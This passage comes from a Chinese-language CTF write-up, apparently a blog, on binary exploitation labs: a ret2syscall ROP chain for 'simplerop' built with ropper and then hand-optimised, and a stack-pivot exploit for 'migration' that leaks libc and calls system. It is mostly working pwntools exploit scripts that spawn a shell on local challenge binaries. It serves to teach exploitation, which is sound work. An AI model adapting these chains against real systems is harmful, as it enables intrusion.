class="lnt">36 </span><span class="lnt">37 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="ch">#!/usr/bin/env python</span> <span class="c1"># Generated by ropper ropchain generator #</span> <span class="kn">from</span> <span class="nn">struct</span> <span class="kn">import</span> <span class="n">pack</span> <span class="n">p</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span> <span class="p">:</span> <span class="n">pack</span><span class="p">(</span><span class="s1">&#39;I&#39;</span><span class="p">,</span> <span class="n">x</span><span class="p">)</span> <span class="n">IMAGE_BASE_0</span> <span class="o">=</span> <span class="mh">0x08048000</span> <span class="c1"># ./simplerop</span> <span class="n">rebase_0</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span> <span class="p">:</span> <span class="n">p</span><span class="p">(</span><span class="n">x</span> <span class="o">+</span> <span class="n">IMAGE_BASE_0</span><span class="p">)</span> <span class="n">rop</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x00072e06</span><span class="p">)</span> <span class="c1"># 0x080bae06: pop eax; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="s1">&#39;//bi&#39;</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x0002682a</span><span class="p">)</span> <span class="c1"># 0x0806e82a: pop edx; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x000a3060</span><span class="p">)</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x0005215d</span><span class="p">)</span> <span class="c1"># 0x0809a15d: mov dword ptr [edx], eax; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x00072e06</span><span class="p">)</span> <span class="c1"># 0x080bae06: pop eax; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="s1">&#39;n/sh&#39;</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x0002682a</span><span class="p">)</span> <span class="c1"># 0x0806e82a: pop edx; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x000a3064</span><span class="p">)</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x0005215d</span><span class="p">)</span> <span class="c1"># 0x0809a15d: mov dword ptr [edx], eax; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x00072e06</span><span class="p">)</span> <span class="c1"># 0x080bae06: pop eax; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">p</span><span class="p">(</span><span class="mh">0x00000000</span><span class="p">)</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x0002682a</span><span class="p">)</span> <span class="c1"># 0x0806e82a: pop edx; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x000a3068</span><span class="p">)</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x0005215d</span><span class="p">)</span> <span class="c1"># 0x0809a15d: mov dword ptr [edx], eax; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x000001c9</span><span class="p">)</span> <span class="c1"># 0x080481c9: pop ebx; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x000a3060</span><span class="p">)</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x0009e910</span><span class="p">)</span> <span class="c1"># 0x080e6910: pop ecx; push cs; or al, 0x41; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x000a3068</span><span class="p">)</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x0002682a</span><span class="p">)</span> <span class="c1"># 0x0806e82a: pop edx; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x000a3068</span><span class="p">)</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x00072e06</span><span class="p">)</span> <span class="c1"># 0x080bae06: pop eax; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">p</span><span class="p">(</span><span class="mh">0x0000000b</span><span class="p">)</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x00026ef0</span><span class="p">)</span> <span class="c1"># 0x0806eef0: int 0x80; ret; </span> <span class="k">print</span> <span class="n">rop</span> <span class="p">[</span><span class="n">INFO</span><span class="p">]</span> <span class="n">rop</span> <span class="n">chain</span> <span class="n">generated</span><span class="err">!</span> </code></pre></td></tr></table> </div> </div><p>简单介绍一下原理，通过一系列 pop|ret 等gadget，使得 eax = 0xb（execve 32 位下的系统调用号），ebx -&gt; /bin/sh， ecx = edx = 0，然后通过 <code>int 0x80</code> 实现系统调用，执行 execve(&quot;/bin/sh&rdquo;, 0, 0)，实际上构造了一个 ret2syscall 的rop chain, hackme.inndy 上也有一道类似的题目<a href="http://www.cnblogs.com/WangAoBo/p/7706719.html#_label3"><strong>ROP2</strong></a></p> <blockquote> <p>ret2syscall 的更多细节可以参考 <a href="https://ctf-wiki.github.io/ctf-wiki/pwn/stackoverflow/basic_rop/#ret2syscall">ctf-wiki</a></p> </blockquote> <p>而当观察 ropper 等工具自动生成的 ropchain 时，会发现有很多步骤是很繁琐的，可以做出很多优化，给一个优化后的例子</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="ch">#!/usr/bin/env python</span> <span class="c1"># Generated by ropper ropchain generator #</span> <span class="kn">from</span> <span class="nn">struct</span> <span class="kn">import</span> <span class="n">pack</span> <span class="n">p</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span> <span class="p">:</span> <span class="n">pack</span><span class="p">(</span><span class="s1">&#39;I&#39;</span><span class="p">,</span> <span class="n">x</span><span class="p">)</span> <span class="n">IMAGE_BASE_0</span> <span class="o">=</span> <span class="mh">0x08048000</span> <span class="c1"># ./simplerop</span> <span class="n">rebase_0</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span> <span class="p">:</span> <span class="n">p</span><span class="p">(</span><span class="n">x</span> <span class="o">+</span> <span class="n">IMAGE_BASE_0</span><span class="p">)</span> <span class="n">pop_edx_ecx_ebx</span> <span class="o">=</span> <span class="mh">0x0806e850</span> <span class="n">rop</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span> <span class="c1"># write /bin/sh\x00 to 0x08048000 + 0x000a3060</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x00072e06</span><span class="p">)</span> <span class="c1"># 0x080bae06: pop eax; ret; </span> <span class="c1"># rop += &#39;//bi&#39;</span> <span class="n">rop</span> <span class="o">+=</span> <span class="s1">&#39;/bin&#39;</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x0002682a</span><span class="p">)</span> <span class="c1"># 0x0806e82a: pop edx; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x000a3060</span><span class="p">)</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x0005215d</span><span class="p">)</span> <span class="c1"># 0x0809a15d: mov dword ptr [edx], eax; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x00072e06</span><span class="p">)</span> <span class="c1"># 0x080bae06: pop eax; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="s1">&#39;/sh</span><span class="se">\x00</span><span class="s1">&#39;</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x0002682a</span><span class="p">)</span> <span class="c1"># 0x0806e82a: pop edx; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x000a3064</span><span class="p">)</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x0005215d</span><span class="p">)</span> <span class="c1"># 0x0809a15d: mov dword ptr [edx], eax; ret; </span> <span class="k">print</span> <span class="s2">&#34;[+]write /bin/sh</span><span class="se">\x00</span><span class="s2"> to 0x08048000 + 0x000a3060&#34;</span> <span class="c1"># rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; </span> <span class="c1"># rop += p(0x00000000)</span> <span class="c1"># rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; </span> <span class="c1"># rop += rebase_0(0x000a3068)</span> <span class="c1"># rop += rebase_0(0x0005215d) # 0x0809a15d: mov dword ptr [edx], eax; ret; </span> <span class="c1"># rop += rebase_0(0x000001c9) # 0x080481c9: pop ebx; ret; </span> <span class="c1"># rop += rebase_0(0x000a3060)</span> <span class="c1"># rop += rebase_0(0x0009e910) # 0x080e6910: pop ecx; push cs; or al, 0x41; ret; </span> <span class="c1"># rop += rebase_0(0x000a3068)</span> <span class="c1"># rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; </span> <span class="c1"># rop += rebase_0(0x000a3068)</span> <span class="c1"># set ebx -&gt; /bin/sh\x00, ecx = edx = 0</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s1">&#39;I&#39;</span><span class="p">,</span> <span class="n">pop_edx_ecx_ebx</span><span class="p">)</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">p</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">p</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x000a3060</span><span class="p">)</span> <span class="k">print</span> <span class="s2">&#34;[+]set ebx -&gt; /bin/sh</span><span class="se">\x00</span><span class="s2">, ecx = edx = 0&#34;</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x00072e06</span><span class="p">)</span> <span class="c1"># 0x080bae06: pop eax; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">p</span><span class="p">(</span><span class="mh">0x0000000b</span><span class="p">)</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x00026ef0</span><span class="p">)</span> <span class="c1"># 0x0806eef0: int 0x80; ret; </span> <span class="n">asset</span> <span class="nb">len</span><span class="p">(</span><span class="n">rop</span><span class="p">)</span> <span class="o">&lt;=</span> <span class="mi">100</span> <span class="o">-</span> <span class="mi">32</span> </code></pre></td></tr></table> </div> </div><p>注释都已经写在代码里了，主要优化了将 /bin/sh\x00 读入以及设置 ebx，ecx，edx 等寄存器的过程</p> <blockquote> <p>或者直接 return 到 read 函数，将 /bin/sh\x00 read 到 bss/data 段，能得到更短的 ropchain, 解决方法有很多,不再细说</p> </blockquote> <p>最终脚本:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">lab5</span> <span class="p">[</span><span class="n">master</span><span class="err">●●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">solve</span><span class="o">.</span><span class="n">py</span> <span class="c1">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">from</span> <span class="nn">struct</span> <span class="kn">import</span> <span class="n">pack</span> <span class="n">p</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span> <span class="p">:</span> <span class="n">pack</span><span class="p">(</span><span class="s1">&#39;I&#39;</span><span class="p">,</span> <span class="n">x</span><span class="p">)</span> <span class="n">IMAGE_BASE_0</span> <span class="o">=</span> <span class="mh">0x08048000</span> <span class="c1"># ./simplerop</span> <span class="n">rebase_0</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span> <span class="p">:</span> <span class="n">p</span><span class="p">(</span><span class="n">x</span> <span class="o">+</span> <span class="n">IMAGE_BASE_0</span><span class="p">)</span> <span class="n">pop_edx_ecx_ebx</span> <span class="o">=</span> <span class="mh">0x0806e850</span> <span class="n">rop</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span> <span class="c1"># write /bin/sh\x00 to 0x08048000 + 0x000a3060</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x00072e06</span><span class="p">)</span> <span class="c1"># 0x080bae06: pop eax; ret; </span> <span class="c1"># rop += &#39;//bi&#39;</span> <span class="n">rop</span> <span class="o">+=</span> <span class="s1">&#39;/bin&#39;</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x0002682a</span><span class="p">)</span> <span class="c1"># 0x0806e82a: pop edx; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x000a3060</span><span class="p">)</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x0005215d</span><span class="p">)</span> <span class="c1"># 0x0809a15d: mov dword ptr [edx], eax; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x00072e06</span><span class="p">)</span> <span class="c1"># 0x080bae06: pop eax; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="s1">&#39;/sh</span><span class="se">\x00</span><span class="s1">&#39;</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x0002682a</span><span class="p">)</span> <span class="c1"># 0x0806e82a: pop edx; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x000a3064</span><span class="p">)</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x0005215d</span><span class="p">)</span> <span class="c1"># 0x0809a15d: mov dword ptr [edx], eax; ret; </span> <span class="k">print</span> <span class="s2">&#34;[+]write /bin/sh</span><span class="se">\x00</span><span class="s2"> to 0x08048000 + 0x000a3060&#34;</span> <span class="c1"># rop += rebase_0(0x00072e06) # 0x080bae06: pop eax; ret; </span> <span class="c1"># rop += p(0x00000000)</span> <span class="c1"># rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; </span> <span class="c1"># rop += rebase_0(0x000a3068)</span> <span class="c1"># rop += rebase_0(0x0005215d) # 0x0809a15d: mov dword ptr [edx], eax; ret; </span> <span class="c1"># rop += rebase_0(0x000001c9) # 0x080481c9: pop ebx; ret; </span> <span class="c1"># rop += rebase_0(0x000a3060)</span> <span class="c1"># rop += rebase_0(0x0009e910) # 0x080e6910: pop ecx; push cs; or al, 0x41; ret; </span> <span class="c1"># rop += rebase_0(0x000a3068)</span> <span class="c1"># rop += rebase_0(0x0002682a) # 0x0806e82a: pop edx; ret; </span> <span class="c1"># rop += rebase_0(0x000a3068)</span> <span class="c1"># set ebx -&gt; /bin/sh\x00, ecx = edx = 0</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="s1">&#39;I&#39;</span><span class="p">,</span> <span class="n">pop_edx_ecx_ebx</span><span class="p">)</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">p</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">p</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x000a3060</span><span class="p">)</span> <span class="k">print</span> <span class="s2">&#34;[+]set ebx -&gt; /bin/sh</span><span class="se">\x00</span><span class="s2">, ecx = edx = 0&#34;</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x00072e06</span><span class="p">)</span> <span class="c1"># 0x080bae06: pop eax; ret; </span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">p</span><span class="p">(</span><span class="mh">0x0000000b</span><span class="p">)</span> <span class="n">rop</span> <span class="o">+=</span> <span class="n">rebase_0</span><span class="p">(</span><span class="mh">0x00026ef0</span><span class="p">)</span> <span class="c1"># 0x0806eef0: int 0x80; ret; </span> <span class="k">assert</span> <span class="nb">len</span><span class="p">(</span><span class="n">rop</span><span class="p">)</span> <span class="o">&lt;=</span> <span class="mi">100</span> <span class="o">-</span> <span class="mi">32</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./simplerop&#34;</span><span class="p">)</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">cyclic</span><span class="p">(</span><span class="mi">32</span><span class="p">)</span> <span class="o">+</span> <span class="n">rop</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34; :&#34;</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div><h3 id="lab6-migration">lab6-migration</h3> <p>栈迁移的问题，可以看出这个题目比起暴力的栈溢出做了两点限制：</p> <ul> <li> <p>每次溢出只有 0x40-0x28-0x4=<strong>20</strong> 个字节的长度可以构造 ropchain</p> </li> <li> <p>通过</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"> <span class="k">if</span> <span class="p">(</span> <span class="n">count</span> <span class="o">!=</span> <span class="mi">1337</span> <span class="p">)</span> <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> </code></pre></td></tr></table> </div> </div></li> </ul> <p>限制了我们只能利用一次 main 函数的溢出（如果能 leak 出栈地址的话, 可以在栈上构造 rop chain 并控制返回地址 ret 到栈上的 rop chain)</p> <p>所以我们就只能通过 20 个字节的 ropchain 来进行 rop 了，关于栈迁移（又称为 stack-pivot）可以看这个 <a href="https://github.com/M4xW4n9/slides/blob/master/pwn_stack/DEP%20%26%20ROP.pdf%0A"><strong>slide</strong></a></p> <blockquote> <p><a href="https://ctf-wiki.github.io/ctf-wiki/pwn/stackoverflow/others/#stack-pivoting">ctf-wiki</a> 上对 stack pivot 也有较为详细的介绍</p> </blockquote> <p><img src="https://raw.githubusercontent.com/M4xW4n9/slides/master/pwn_stack/stackPivot.jpg" alt="stackPivot"></p> <p>我的exp：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="n">lab6</span> <span class="p">[</span><span class="n">master</span><span class="err">●●</span><span class="p">]</span> <span class="n">cat</span> <span class="n">solve</span><span class="o">.</span><span class="n">py</span> <span class="c1">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">from</span> <span class="nn">time</span> <span class="kn">import</span> <span class="n">sleep</span> <span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s2">&#34;debug&#34;</span> <span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s2">&#34;deepin-terminal&#34;</span><span class="p">,</span> <span class="s2">&#34;-x&#34;</span><span class="p">,</span> <span class="s2">&#34;sh&#34;</span><span class="p">,</span> <span class="s2">&#34;-c&#34;</span><span class="p">]</span> <span class="k">def</span> <span class="nf">DEBUG</span><span class="p">():</span> <span class="nb">raw_input</span><span class="p">(</span><span class="s2">&#34;DEBUG: &#34;</span><span class="p">)</span> <span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">io</span><span class="p">)</span> <span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;./migration&#34;</span><span class="p">)</span> <span class="n">libc</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">libc</span> <span class="c1"># bufAddr = elf.bss()</span> <span class="n">bufAddr</span> <span class="o">=</span> <span class="mh">0x0804a000</span> <span class="n">readPlt</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">plt</span><span class="p">[</span><span class="s2">&#34;read&#34;</span><span class="p">]</span> <span class="n">readGot</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">got</span><span class="p">[</span><span class="s2">&#34;read&#34;</span><span class="p">]</span> <span class="n">putsPlt</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">plt</span><span class="p">[</span><span class="s2">&#34;puts&#34;</span><span class="p">]</span> <span class="n">p1ret</span> <span class="o">=</span> <span class="mh">0x0804836d</span> <span class="n">p3ret</span> <span class="o">=</span> <span class="mh">0x08048569</span> <span class="n">leaveRet</span> <span class="o">=</span> <span class="mh">0x08048504</span> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s2">&#34;./migration&#34;</span><span class="p">)</span> <span class="c1"># DEBUG()</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">flat</span><span class="p">([</span><span class="n">cyclic</span><span class="p">(</span><span class="mh">0x28</span><span class="p">),</span> <span class="n">bufAddr</span> <span class="o">+</span> <span class="mh">0x100</span><span class="p">,</span> <span class="n">readPlt</span><span class="p">,</span> <span class="n">leaveRet</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">bufAddr</span> <span class="o">+</span> <span class="mh">0x100</span><span class="p">,</span> <span class="mh">0x100</span><span class="p">])</span> <span class="n">io</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s2">&#34; :</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> <span class="n">sleep</span><span class="p">(</span><span class="mf">0.1</span><span class="p">)</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">flat</span><span class="p">([</span><span class="n">bufAddr</span> <span class="o">+</span> <span class="mh">0x600</span><span class="p">,</span> <span class="n">putsPlt</span><span class="p">,</span> <span class="n">p1ret</span><span class="p">,</span> <span class="n">readGot</span><span class="p">,</span> <span class="n">readPlt</span><span class="p">,</span> <span class="n">leaveRet</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">bufAddr</span> <span class="o">+</span> <span class="mh">0x600</span><span class="p">,</span> <span class="mh">0x100</span><span class="p">])</span> <span class="n">io</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">sleep</span><span class="p">(</span><span class="mf">0.1</span><span class="p">)</span> <span class="c1"># print io.recv()</span> <span class="n">libcBase</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">recv</span><span class="p">()[:</span> <span class="mi">4</span><span class="p">])</span> <span class="o">-</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;read&#39;</span><span class="p">]</span> <span class="n">success</span><span class="p">(</span><span class="s2">&#34;libcBase -&gt; {:#x}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">libcBase</span><span class="p">))</span> <span class="n">pause</span><span class="p">()</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">flat</span><span class="p">([</span><span class="n">bufAddr</span> <span class="o">+</span> <span class="mh">0x100</span><span class="p">,</span> <span class="n">readPlt</span><span class="p">,</span> <span class="n">p3ret</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">bufAddr</span> <span class="o">+</span> <span class="mh">0x100</span><span class="p">,</span> <span class="mh">0x100</span><span class="p">,</span> <span class="n">libcBase</span> <span class="o">+</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;system&#39;</span><span class="p">],</span> <span class="mh">0xdeadbeef</span><span class="p">,</span> <span class="n">bufAddr</span> <span class="o">+</span> <span class="mh">0x100</span><span class="p">])</span> <span class="n">io</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">sleep</span><span class="p">(</span><span class="mf">0.1</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="s2">&#34;$0</span><span class="se">\0</span><span class="s2">&#34;</span><span class="p">)</span> <span class="n">sleep</span><span class="p">(</span><span class="mf">0.1</span><span class="p">)</span> <span 